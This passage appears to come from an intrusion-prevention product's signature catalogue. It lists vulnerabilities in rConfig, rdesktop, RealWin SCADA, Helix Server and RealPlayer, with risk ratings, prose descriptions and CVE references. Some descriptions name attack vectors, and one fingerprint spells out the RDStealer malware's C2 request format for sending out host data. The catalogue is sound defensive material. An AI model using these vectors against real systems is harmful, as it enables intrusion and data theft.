Input Validation

Description:

A cross-site scripting vulnerability has been reported in rConfig Network Device Configuration Tool. The vulnerability is due to improper validation of rid request parameter by configDevice.php. A remote attacker could exploit this vulnerability by enticing a victim to open a link or a web page. Successful exploitation could result in the execution of script code in security context of the target user's browser.

Situation:

HTTP_CRL-rConfig-Network-Device-Configuration-Tool-Configdevice.php-Cross-Site-Scripting

References:

CVE-2020-12259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12259

rConfig-Network-Device-Configuration-Tool-DeviceMgmt-Cross-Site-Scripting

About this vulnerability:

A vulnerability in rConfig Network Device Configuration Tool

Risk:

Moderate

First detected in:

sgpkg-ips-1270-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

rConfig

Type:

Input Validation

Description:

Improper validation of request parameters causes a cross-site scripting vulnerability in rConfig. A successful exploit allows an attacker to run scripts in the affected user's browser.

Situation:

HTTP_CRL-rConfig-Network-Device-Configuration-Tool-DeviceMgmt-Cross-Site-Scripting

References:

CVE-2020-12256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12256

rConfig-Network-Device-Configuration-Vendor-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in rConfig Network Device Configuration Tool

Risk:

Moderate

First detected in:

sgpkg-ips-1283-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

rConfig

Type:

Input Validation

Description:

Improper validation of file uploads in vendor.crud.php causes a file upload vulnerability. A successful exploit allows an attacker to upload arbitrary code to be executed by the target system.

Situation:

HTTP_CS-rConfig-Network-Device-Configuration-Vendor-Arbitrary-File-Upload

References:

CVE-2020-12255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12255

rConfig-Remote-Code-Execution-CVE-2019-16662

About this vulnerability:

A vulnerability in rConfig

Risk:

High

First detected in:

sgpkg-ips-1200-5242

Last changed:

sgpkg-ips-1731-5242

Platform:

Generic

Software:

rConfig

Type:

Malfunction

Description:

There exists a pre-auth remote code execution vulnerability in rConfig. Succesful exploitation could lead in arbitrary code execution. This situation also covers post-auth RCE vulnerability CVE-2019-16663.

References:

CVE-2019-16662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16662

rConfig-Search.crud.php-Command-Injection

About this vulnerability:

A vulnerability in rConfig Network Device Configuration Tool

Risk:

Moderate

First detected in:

sgpkg-ips-1202-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

rConfig

Type:

Input Validation

Description:

There exists a post-auth command injection vulnerability in rConfig Network Device Configuration Tool. Succesful exploitation could lead in arbitrary command execution.

Situation:

HTTP_CRL-rConfig-Search.crud.php-Command-Injection

References:

CVE-2019-16663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16663

rConfig-Vendors-Authenticated-File-Upload-RCE

About this vulnerability:	A vulnerability in rConfig.
Risk:	High
First detected in:	sgpkg-ips-1366-5242
Last changed:	sgpkg-ips-1366-5242
Platform:	Generic
Software:	rConfig
Type:	Input Validation
Description:	A vulnerability in rConfig, versions 3.9.6 and before, which allows remote attackers to upload arbitrary files to /lib/crud/vendors.crud.php and exexute them via images/vendor/<payload_file>.php.
Situation:	HTTP_CS-rConfig-Vendors-Authenticated-File-Upload-RCE

Rdesktop-Process_Redirect_PDU-BSS-Overflow

About this vulnerability:

A vulnerability in rdesktop

Risk:

High

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; Unix;

Software:

rdesktop

Type:

Malfunction

Description:

Buffer overflow in the process_redirect_pdu (rdp.c) function in rdesktop 1.5.0 allows remote attackers to execute arbitrary code via a Remote Desktop Protocol (RDP) redirect request with modified length fields.

Situation:

Generic_SS-Rdesktop-Process_Redirect_PDU-BSS-Overflow

References:

CVE-2008-1802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1802

BID-29097
http://www.securityfocus.com/bid/29097

RDP-ActiveX-Control-Remote-Code-Execution-Vulnerability

About this vulnerability:

A vulnerability in an ActiveX RDP component

Risk:

Moderate

First detected in:

sgpkg-ips-519-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Attack against an ActiveX RDP component

Situation:

File-Text_RDP-ActiveX-Control-Remote-Code-Execution-Vulnerability

References:

CVE-2013-1296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1296

BID-58874
http://www.securityfocus.com/bid/58874

OSVDB-92122
http://www.osvdb.org/92122

MS13-029
http://technet.microsoft.com/security/bulletin/MS13-029

RDP_Microsoft-Remote-Desktop-Client-Vulnerability-MS09-044

About this vulnerability:

Clientside remote code execution vulnerability in Remote Desktop

Risk:

High

First detected in:

sgpkg-ips-237-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A client-side vulnerability exists in Microsoft Remote Desktop Software. If a user connects to a malicious RDP server, the remote server can trigger the vulnerability and execute arbitrary code in the victim's computer.

Situation:

Generic_RDP-Client-Remote-Code-Execution-MS09-044

References:

CVE-2009-1133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1133

MS09-044
http://technet.microsoft.com/security/bulletin/MS09-044

RDS.Dataspace-ActiveX-Control-Remote-Code-Execution

About this vulnerability:

There is a code execution vulnerability in RDS.Dataspace ActiveX Control

Risk:

High

First detected in:

sgpkg-ips-97-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Data Access Components

Type:

Malfunction

Description:

There is a remote code execution vulnerability in RDS.Dataspace ActiveX control included in the Microsoft Data Access Components (MDAC).

Situation:

HTTP_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution
HTTP_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-2
HTTP_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-3
File-Text_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-3
File-Text_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-2
File-Text_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-4

References:

CVE-2006-0003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003

BID-17462
http://www.securityfocus.com/bid/17462

OSVDB-24517
http://www.osvdb.org/24517

MS06-014
http://technet.microsoft.com/security/bulletin/MS06-014

RDStealer-Malware-C2-Traffic

About this vulnerability:	Command-and-control traffic by RDStealer malware detected
Risk:	High
First detected in:	sgpkg-ips-1604-5242
Last changed:	sgpkg-ips-1604-5242
Platform:	Generic
Software:	RDStealer Malware
Type:	Backdoor
Description:	This fingerprint catches the request that RDStealer malware makes to another server on the same network that was designated as a proxy to communicate with the C2 infrastructure of threat actors. The request is in the format: https://<Proxy Address>:7443/pdr.php?name=<Host>&ip=<Host IP Address>.
Situation:	HTTP_CSU-RDStealer-Malware-C2-Traffic File-Text_RDStealer-Malware-C2-Traffic

RealFlex-RealWin-FC_RFUSER_FCS_Login-Buffer-Overflow

About this vulnerability:	A vulnerability in RealFlex RealWin SCADA System
Risk:	Moderate
First detected in:	sgpkg-ips-384-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	RealFlex RealWin SCADA System; RealFlex RealWin SCADA System
Type:	Buffer Overflow
Description:	There exists a buffer overflow vulnerability in RealFlex RealWin SCADA server that could be exploited by remote attackers to compromise a vulnerable system. The flaw is due to a boundary error in the handling of a "FC_RFUSER_FCS_LOGIN" request sent to the server. Remote, unauthenticated attackers could exploit this vulnerability by sending a specially crafted packet to TCP port 910 on the target. Successful exploitation would cause a stack buffer overflow that could cause the host to become unresponsive, and may lead to code injection and execution in the context of the affected server, normally Administrator on Windows systems.
Situation:	Generic_CS-RealFlex-RealWin-FC_RFUSER_FCS_Login-Buffer-Overflow

RealFlex-RealWin-FC_Script_FCS_STARTPROG-Buffer-Overflow

About this vulnerability:	A vulnerability in RealFlex RealWin SCADA System
Risk:	Moderate
First detected in:	sgpkg-ips-385-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	RealFlex RealWin SCADA System
Type:	Buffer Overflow
Description:	A stack-based buffer overflow vulnerability exists in RealFlex RealWin SCADA server that could be exploited by remote attackers to compromise a vulnerable system. The flaw is due to a boundary error in the handling of "On_FC_SCRIPT_FCS_STARTPROG" requests sent to the server. Remote, unauthenticated attackers could exploit this vulnerability via sending a specially crafted packet to TCP port 910 on the target. Successful exploitation may lead to code injection and execution in the context of the affected server, normally Administrator on Windows systems, or cause the target server to become unresponsive.
Situation:	Generic_CS-RealFlex-RealWin-FC_Script_FCS_STARTPROG-Buffer-Overflow

RealFlex-RealWin-Multiple-Buffer-Overflows

About this vulnerability:

Multiple vulnerabilities in RealFlex RealWin SCADA System

Risk:

Moderate

First detected in:

sgpkg-ips-610-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

RealFlex RealWin SCADA System

Type:

Buffer Overflow

Description:

There are multiple stack-based buffer overflows in DATAC RealFlex RealWin 2.1 and earlier. The vulnerabilities allow remote attackers to execute arbitrary code via various crafted packets sent to port 910.

Situation:

Generic_CS-RealFlex-RealWin-Buffer-Overflow-Attempt

References:

CVE-2011-1563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1563

BID-46937
http://www.securityfocus.com/bid/46937

RealFlex-RealWin-SCADA-Scpc_Initialize-Buffer-Overflow

About this vulnerability:

A vulnerability in RealFlex RealWin SCADA System

Risk:

High

First detected in:

sgpkg-ips-382-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealFlex RealWin SCADA System

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in RealFlex RealWin SCADA System that could be exploited by remote attackers to compromise a vulnerable system.

Situation:

Generic_CS-RealFlex-RealWin-SCADA-Scpc_Initialize-Buffer-Overflow

References:

CVE-2010-4142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4142

BID-44150
http://www.securityfocus.com/bid/44150

RealFlex-RealWin-Tag-Manipulation-Buffer-Overflow

About this vulnerability:	A vulnerability in RealFlex RealWin SCADA System
Risk:	Moderate
First detected in:	sgpkg-ips-385-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	RealFlex RealWin SCADA System
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability has been reported in RealFlex RealWin SCADA server that could be exploited by remote attackers to compromise a vulnerable system. The flaw is due to a boundary error in the handling of FC_CTAGLIST_FCS_CADDTAG, FC_CTAGLIST_FCS_CDELTAG and FC_CTAGLIST_FCS_ADDTAGMS requests sent to the server. Remote, unauthenticated attackers could exploit this vulnerability via sending a specially crafted packet to TCP port 910 on the target. Successful exploitation would cause a stack buffer overflow that could cause the host to become unresponsive, and may lead to code injection and execution in the context of the affected server.
Situation:	Generic_CS-RealFlex-RealWin-Tag-Manipulation-Buffer-Overflow

RealNetworks-Helix-Server-NTLM-Authentication-Heap-Overflow

About this vulnerability:

A vulnerability in RealNetworks Helix Mobile Server

Risk:

High

First detected in:

sgpkg-ips-319-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealNetworks Helix Server

Type:

Buffer Overflow

Description:

There is a heap-based buffer overflow vulnerability in the RealNetworks Helix Server product. The flaw is due to an error when handling Base64-encoded NTLM Authentication data. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted request to the target server. Successful exploitation can allow for arbitrary code injection and execution with the privileges of the server process.

Situation:

HTTP_CSH-RealNetworks-Helix-Server-NTLM-Authentication-Heap-Overflow

References:

CVE-2010-1317
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1317

BID-39490
http://www.securityfocus.com/bid/39490

RealNetworks-Helix-Server-RN5auth-Credential-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in RealNetworks Helix Mobile Server

Risk:

High

First detected in:

sgpkg-ips-454-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealNetworks Helix Mobile Server; RealNetworks Helix Server

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in RealNetworks Helix Server. The vulnerability is caused by improper handling of crafted rn5auth authentication data. A remote unauthenticated attacker could possibly exploit this vulnerability to execute arbitrary code with System privileges. A failed exploit attempt will terminate the affected server, creating a denial of service condition.

Situation:

Generic_CS-RealNetworks-Helix-Server-RN5auth-Credential-Parsing-Buffer-Overflow
Generic_UDP-RealNetworks-Helix-Server-RN5auth-Credential-Parsing-Buffer-Overflow

References:

CVE-2012-0942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0942

BID-52929
http://www.securityfocus.com/bid/52929

OSVDB-81056
http://www.osvdb.org/81056

RealNetworks-Helix-Server-RTSP-Describe-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in RealNetworks Helix Mobile Server

Risk:

Moderate

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealNetworks Helix Mobile Server; RealNetworks Helix Server; RealNetworks Helix DNA Server

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the way RealNetworks Helix Server handles RTSP requests. Remote unauthenticated attackers can exploit this vulnerability by sending a malicious RTSP request with a crafted Proxy-Require to the affected server. As a result of processing the malicious command, a heap-based buffer overflow can be triggered which may result in injection and execution of arbitrary code within the security privileges of the vulnerable service on the target system. In the case of an attack, where code injection is unsuccessful, the Helix Server service will terminate, and all the connected sessions will be closed immediately. Furthermore, the functionality of all the services that depend on the vulnerable service might be affected as well. In the case where code injection was successful, the behaviour of the system will be entirely dependent on the nature of the injected code. Any code executed will be with the the security privileges of the vulnerable service, normally System.

Situation:

Generic_CS-RealNetworks-Helix-Server-RTSP-Describe-Heap-Buffer-Overflow

References:

CVE-2008-5911
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5911

BID-33059
http://www.securityfocus.com/bid/33059

RealNetworks-Helix-Server-RTSP-GET-Long-URI

About this vulnerability:

A long URI in GET-request for RealNetworks Helix Server detected

Risk:

Low

First detected in:

sgpkg-ips-506-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealNetworks Helix Server

Type:

Buffer Overflow

Description:

A long URI in a GET-request for RealNetworks Helix RTSP Server was detected. Multiple matches may indicate an attempt to exploit a buffer overflow vulnerability in Helix Server versions below 9.0.

Situation:

Generic_CS-RealNetworks-Helix-Server-RTSP-GET-Long-URI

References:

CVE-2002-1643
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1643

BID-6458
http://www.securityfocus.com/bid/6458

BID-6456
http://www.securityfocus.com/bid/6456

BID-6454
http://www.securityfocus.com/bid/6454

RealNetworks-Helix-Server-RTSP-Set-Parameters-Request-DoS

About this vulnerability:

A vulnerability in RealNetworks Helix Unversal Server

Risk:

Moderate

First detected in:

sgpkg-ips-233-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealNetworks Helix Universal Server

Type:

Malfunction

Description:

There is a denial of service vulnerability in RealNetworks Helix Server. The vulnerability is due to a logic error in the way RealNetworks Helix Server handle RTSP requests. Remote unauthenticated attackers can exploit this vulnerability by sending a crafted RTSP SET_PARAMETER request to the affected server. As a result of processing the malicious command, a denial of service condition will be created on the target system, the affected service may become unresponsive until it is restarted.

Situation:

Generic_CS-RealNetworks-Helix-Server-RTSP-Set-Parameters-Request-DoS

References:

CVE-2009-2533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2533

BID-35731
http://www.securityfocus.com/bid/35731

OSVDB-55981
http://www.osvdb.org/55981

RealNetworks-Helix-Server-RTSP-Setup-Request-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in RealNetworks Helix Mobile Server

Risk:

Moderate

First detected in:

sgpkg-ips-252-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

RealNetworks Helix Server

Type:

Input Validation

Description:

There is a denial of service vulnerability in RealNetworks Helix Server. The vulnerability is due to an error in the way Helix Server handles SETUP requests. Remote unauthenticated attackers can exploit this flaw by sending a crafted SETUP request to an affected server. As a result of processing the malicious command, a denial of service condition will be created on the target system.

Situation:

Generic_CS-RealNetworks-Helix-Server-RTSP-Setup-Request-Denial-Of-Service

References:

CVE-2009-2534
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2534

BID-35732
http://www.securityfocus.com/bid/35732

OSVDB-55982
http://www.osvdb.org/55982

RealNetworks-Helix-Server-RTSP-Setup-Stack-Buffer-Overflow

About this vulnerability:	A buffer overflow vulnerability in RealNetworks Helix Server
Risk:	High
First detected in:	sgpkg-ips-253-3038
Last changed:	sgpkg-ips-1552-5242
Platform:	Windows; Linux
Software:	RealNetworks Helix Server; RealNetworks Helix DNA Server
Type:	Buffer Overflow
Description:	There is a buffer overflow vulnerability in the way RealNetworks Helix Server handles RTSP requests. Remote unauthenticated attackers can exploit this vulnerability by sending malicious RTSP SETUP requests to the affected server.

RealNetworks-Helix-Server-RTSP-Set_Parameter-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in RealNetworks Helix Mobile Server

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealNetworks Helix Mobile Server; RealNetworks Helix Server; RealNetworks Helix DNA Server

Type:

Buffer Overflow

Description:

Situation:

RTSP_CS-RealNetworks-Helix-Server-RTSP-Set_Parameter-Heap-Buffer-Overflow

References:

BID-33059
http://www.securityfocus.com/bid/33059

RealNetworks-Helix-Server-SNMP-Master-Agent-Open-PDU-DOS

About this vulnerability:

A vulnerability in RealNetworks Helix Mobile Server

Risk:

Moderate

First detected in:

sgpkg-ips-451-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealNetworks Helix Mobile Server; RealNetworks Helix Server

Type:

Malfunction

Description:

A denial of service vulnerability has been reported in RealNetworks Helix Server. The vulnerability is caused by improper handling of crafted "DisplayStringLength" parameter in AgentX Open-PDU requests. A remote unauthenticated attacker can exploit this vulnerability to terminate the target service, creating a denial of service condition.

Situation:

Generic_CS-RealNetworks-Helix-Server-SNMP-Master-Agent-Open-PDU-DOS

References:

CVE-2012-1923
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1923

BID-52929
http://www.securityfocus.com/bid/52929

OSVDB-81054
http://www.osvdb.org/81054

RealNetworks-Helix-Transport-Header-Overflow

About this vulnerability:

Buffer overflow in RealNetworks Helix Universal Server Transport header

Risk:

Moderate

First detected in:

sgpkg-ips-505-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealNetworks Helix Server

Type:

Buffer Overflow

Description:

There is a series of buffer overflow vulnerabilities in older versions of RealNetworks Helix Server. Using a specially crafted Transport-header, an attacker can possibly execute arbitary code in the target server.

Situation:

Generic_CS-RealNetworks-Helix-Transport-Header-Overflow

References:

CVE-2002-1643
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1643

BID-6454
http://www.securityfocus.com/bid/6454

OSVDB-4580
http://www.osvdb.org/4580

RealNetworks-Helix-Universal-Server-Denial-Of-Service-Vulnerability

About this vulnerability:

A vulnerability in RealNetworks Helix Universal Server

Risk:

Moderate

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealNetworks Helix Universal Server

Type:

Buffer Overflow

Description:

RealNetworks Helix Universal Server 9.0.1 and 9.0.2 allows remote attackers to cause a denial of service (crash) via malformed requests that trigger a null dereference, as demonstrated using (1) GET_PARAMETER or (2) DESCRIBE requests.

Situation:

Generic_CS-RealNetworks-Helix-Universal-Server-Denial-Of-Service-Vulnerability

References:

CVE-2004-0389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0389

BID-10157
http://www.securityfocus.com/bid/10157

RealNetworks-Helix-Universal-Server-RTSP-Describe-BOF

About this vulnerability:

Buffer overflow in RealNetworks Helix Universal Server

Risk:

High

First detected in:

sgpkg-ips-13-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealNetworks Helix Universal Server

Type:

Buffer Overflow

Description:

RealNetworks Helix Universal Server is vulnerable to a buffer overflow due to insufficient bounds checking on the 'describe' field of a RTSP request. This allows remote execution of arbitrary code with the privileges of the Helix Universal Server process.

Situation:

Generic_RealNetworks-Helix-Universal-Server-RTSP-Describe-BOF

References:

CVE-2002-1643
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1643

BID-6456
http://www.securityfocus.com/bid/6456

RealNetworks-RealGames-StubbyUtil-ProcessMgr-ActiveX-Command-Execution

About this vulnerability:

An attempt to exploit a vulnerability in RealNetworks RealGames

Risk:

Moderate

First detected in:

sgpkg-ips-394-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

RealNetworks RealGames

Type:

Malfunction

Description:

Multiple remote command execution vulnerabilities exist in RealNetworks RealGames StubbyUtil.ProcessMgr ActiveX. The vulnerabilities are due to design flaws in four insecurely implemented methods. An attacker can leverage this vulnerability by enticing a target user to open a crafted web page.

Situation:

HTTP_SS-RealNetworks-RealGames-StubbyUtil-ProcessMgr-ActiveX-Command-Execution
File-Text_RealNetworks-RealGames-StubbyUtil-ProcessMgr-ActiveX-Command-Execution

References:

OSVDB-71559
http://www.osvdb.org/71559

RealNetworks-RealPlayer-ActiveX-Import-Method-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the RealNetworks RealPlayer ActiveX control

Risk:

High

First detected in:

sgpkg-ips-161-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

RealPlayer

Type:

Buffer Overflow

Description:

RealNetworks RealPlayer has a stack-based buffer overflow vulnerability. By persuading a user with an affected version of the product to visit a malicious web page, a remote attacker can execute arbitrary code on a vulnerable host with the privileges of the currently logged in user.

Situation:

HTTP_SS-RealNetworks-RealPlayer-ActiveX-Import-Method-Buffer-Overflow
File-Text_RealNetworks-RealPlayer-ActiveX-Import-Method-Buffer-Overflow

References:

CVE-2008-3066
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3066

BID-30379
http://www.securityfocus.com/bid/30379

RealNetworks-RealPlayer-CDDA-URI-Uninitialized-Pointer-Code-Execution

About this vulnerability:

A vulnerability in RealNetworks Realplayer

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

RealPlayer; RealPlayer SP

Type:

Malfunction

Description:

A code execution vulnerability exists in RealNetworks RealPlayer ActiveX control. The vulnerability is due access to uninitialized memory during processing of CDDA URIs. An attacker can leverage this vulnerability by enticing a target user to open a crafted web file. Successful exploitation would allow an attacker to execute arbitrary code in the security context of the logged in user. An unsuccessful attack could cause an abnormal termination of the affected product.

Situation:

HTTP_SS-RealNetworks-RealPlayer-CDDA-URI-Uninitialized-Pointer-Code-Execution
File-Text_RealNetworks-RealPlayer-CDDA-URI-Uninitialized-Pointer-Code-Execution

References:

CVE-2010-3747
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3747

BID-44144
http://www.securityfocus.com/bid/44144

RealNetworks-RealPlayer-FLV-Parsing-Two-Integer-Overflow-Vulnerabilities

About this vulnerability:

A vulnerability in RealNetworks RealPlayer

Risk:

Moderate

First detected in:

sgpkg-ips-404-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

RealPlayer; RealPlayer SP

Type:

Integer Overflow

Description:

Two remote code execution vulnerabilities exists in RealNetworks RealPlayer. The vulnerabilities are due to two integer overflow errors while parsing the ECMA Array and the Strict Array type data in FLV files. An attacker can leverage this vulnerability by enticing a target user to open a crafted IVR file. Successful exploitation would allow an attacker to execute arbitrary code in the security context of the logged in user. An unsuccessful attack could cause an abnormal termination of the affected product.

Situation:

HTTP_SS-RealNetworks-RealPlayer-FLV-Parsing-Two-Integer-Overflow-Vulnerabilities
File-Flash_RealNetworks-RealPlayer-FLV-Parsing-Integer-Overflow

References:

CVE-2010-3000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3000

BID-42775
http://www.securityfocus.com/bid/42775

RealNetworks-RealPlayer-Ivr-Handling-Heap-Buffer-Overflow

About this vulnerability:	A vulnerability in RealNetworks RealPlayer
Risk:	Moderate
First detected in:	sgpkg-ips-410-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	RealPlayer
Type:	Buffer Overflow
Description:	A heap buffer overflow vulnerability exists in RealNetworks RealPlayer. The vulnerability is due to lack of input validation when parsing IVR files. The application uses a 32-bit value provided in the file as the size of the buffer that should be allocated. An attacker can exploit this vulnerability by enticing a target user to open a malicious file. Successful exploitation would allow an attacker to execute arbitrary code in the security context of the logged in user. An unsuccessful attack could cause an abnormal termination of the affected product.
Situation:	File-Binary_RealNetworks-RealPlayer-Ivr-BOF File-Text_RealPlayer-Vulnerable-Embedded-ActiveX-Control

RealNetworks-RealPlayer-Mp3-Files-Processing-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in RealNetworks RealPlayer

Risk:

High

First detected in:

sgpkg-ips-129-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealPlayer; RealOne Player; RealPlayer Enterprise

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in RealNetworks' RealPlayer. The vulnerability is related to errors in processing overly long Lyrics3 v2.00 tags in MP3 files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted MP3 file. Successful exploitation causes a heap-based buffer overflow that can be used to execute arbitrary code within the privileges of the logged in user.

Situation:

HTTP_SS-RealNetworks-RealPlayer-Mp3-Files-Processing-Buffer-Overflow
File-Binary_RealNetworks-RealPlayer-Mp3-Files-Processing-Buffer-Overflow

References:

CVE-2007-5080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5080

BID-26214
http://www.securityfocus.com/bid/26214

RealNetworks-RealPlayer-MPEG-Width-Integer-Underflow-Memory-Corruption

About this vulnerability:

A vulnerability in RealNetworks RealPlayer

Risk:

Moderate

First detected in:

sgpkg-ips-427-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealPlayer

Type:

Integer Overflow

Description:

There is an integer underflow vulnerability in RealPlayer's handling of MPEG movies. The vulnerability is caused when the application subtracts one from a user controlled value that is then used as a loop iterator. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted MPEG file. Successful exploitation can lead to the injection and execution of arbitrary code in the context of the currently logged in user.

Situation:

File-MPEG_RealPlayer-MPEG-Width-Integer-Underflow-Memory-Corruption

References:

CVE-2011-4259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4259

BID-50741
http://www.securityfocus.com/bid/50741

OSVDB-77280
http://www.osvdb.org/77280

RealNetworks-RealPlayer-Playlist-Handling-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in RealPlayer

Risk:

High

First detected in:

sgpkg-ips-126-2032

Last changed:

sgpkg-ips-1555-5242

Platform:

Windows

Software:

RealPlayer

Type:

Buffer Overflow

Description:

There is a remote code execution vulnerability in RealNetworks' RealPlayer application. The vulnerability is due to a signedness error when handling playlist names. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-RealNetworks-RealPlayer-Playlist-Handling-Buffer-Overflow
HTTP_SS-RealNetworks-RealPlayer-Playlist-Handling-Exploit
File-Text_RealNetworks-RealPlayer-Playlist-Handling-Exploit

References:

CVE-2007-5601
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5601

BID-26130
http://www.securityfocus.com/bid/26130

RealNetworks-RealPlayer-Qcp-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in RealNetworks Mac RealPlayer

Risk:

Moderate

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealPlayer

Type:

Buffer Overflow

Description:

A heap buffer overflow exists in RealNetworks RealPlayer. The vulnerability is due to insufficient bounds checking while copying user-supplied data into a fixed-length buffer. This can lead to a buffer overflow and subsequent memory corruption. A remote attacker can exploit this vulnerability by enticing a user to download and process a malicious QCP file with a vulnerable version of the application. A successful attack would result in the execution of attacker-controlled code in the security context of the current user.

Situation:

File-RIFF_RealNetworks-RealPlayer-Qcp-Parsing-Buffer-Overflow

References:

CVE-2011-2950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2950

BID-49172
http://www.securityfocus.com/bid/49172

RealNetworks-RealPlayer-RecordClip-Parameter-Injection

About this vulnerability:

A vulnerability in RealNetworks RealPlayer

Risk:

High

First detected in:

sgpkg-ips-372-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

RealPlayer

Type:

Input Validation

Description:

There is a code execution vulnerability in RealNetworks RealPlayer ActiveX control. The vulnerability is due to an injection of a specific character into the arguments passed to the RecordClip method. An attacker can leverage this vulnerability by enticing a target user to open a crafted web file. Successful exploitation would allow an attacker to download arbitrary command files on the target host. This may potentially lead to arbitrary code execution.

Situation:

HTTP_SS-RealNetworks-RealPlayer-RecordClip-Parameter-Injection
File-Text_RealNetworks-RealPlayer-RecordClip-Parameter-Injection

References:

CVE-2010-3749
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3749

BID-44443
http://www.securityfocus.com/bid/44443

RealNetworks-RealPlayer-rmoc3260.dll-ActiveX-Control-Memory-Corruption

About this vulnerability:

A vulnerability in RealNetworks' RealPlayer

Risk:

High

First detected in:

sgpkg-ips-161-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

RealPlayer

Type:

Malfunction

Description:

